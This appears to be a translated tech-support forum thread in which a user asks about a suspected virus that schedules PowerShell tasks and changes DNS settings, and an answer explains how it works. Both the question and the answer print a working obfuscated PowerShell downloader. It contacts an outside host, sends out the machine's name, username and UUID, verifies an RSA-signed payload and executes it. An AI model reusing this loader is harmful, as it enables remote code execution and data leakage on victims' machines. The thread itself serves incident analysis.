Powershell 计划任务自动创建并将我的 DNS 更改为 8.8.8.8 和 9.9.9.9

tag-icon tag-icon dns powershell virus
Powershell 计划任务自动创建并将我的 DNS 更改为 8.8.8.8 和 9.9.9.9

我遇到了一个问题,我认为是病毒。它在 TaskScheduler 中创建 PowerShell 脚本。它似乎正在运行 WMIC 和 powershell。它使用以下代码创建任务:

-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.pp6'+'r1.com';a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

它在 C:\Windows\System32\WindowsPowerShell\v1.0 中创建一个随机命名的文件(与 powershell.exe 的大小和创建日期相同)。

我已经阻止了它尝试访问的网站,并且我已经删除了几个 WMIC“自动运行”,但它仍然将 DNS 条目更改为 8.8.8.8 和 9.9.9.9。

我正在更换受影响的计算机,但想知道是否有人可以帮助使上述内容可读,以便我可以检查网络中的其他机器是否有痕迹。

或者它是否透露了任何可能有用的信息。

提前致谢。

答案1

powershell脚本很简单,联系网站,下载(加密)payload,执行payload(Iex命令)。

它看起来类似于木马病毒

正如您所见,脚本只是可能已经完成的众多事情之一。

以下是该脚本的简要概述

-c

告诉 powershell 执行以下代码块

function a($u)
{
    $d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);
    $c=$d.count;
    if($c -gt 173) 
    {
        $b=$d[173..$c];
        $p=New-Object Security.Cryptography.RSAParameters;
        $p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');
        $p.Exponent=0x01,0x00,0x01;
        $r=New-Object Security.Cryptography.RSACryptoServiceProvider;
        $r.ImportParameters($p);
        if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171]))))
            {
                I`ex(-join[char[]]$b)
            }
    }
}

创建一个名为 a 的函数,该函数以 URL u 作为参数。它将从 URL 下载一些数据。如果数据足够大,则忽略下部并解密“有效载荷”。检查有效载荷是否良好,然后执行有效载荷(Iex 命令)。

$url='http://'+'t.pp6'+'r1.com';
a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

这会根据您的某些计算机设置将 URL 拼凑在一起,并使用该 URL 调用上面定义的函数。

无论如何,除了您找到的脚本之外,可能还有很多其他事情正在发生。检查我上面链接的 URL,找到一款可以消除威胁的防病毒软件,或者更好的方法是清除并重新安装。如果机器允许远程访问,请不要忘记检查是否有任何帐户被盗用。

相关内容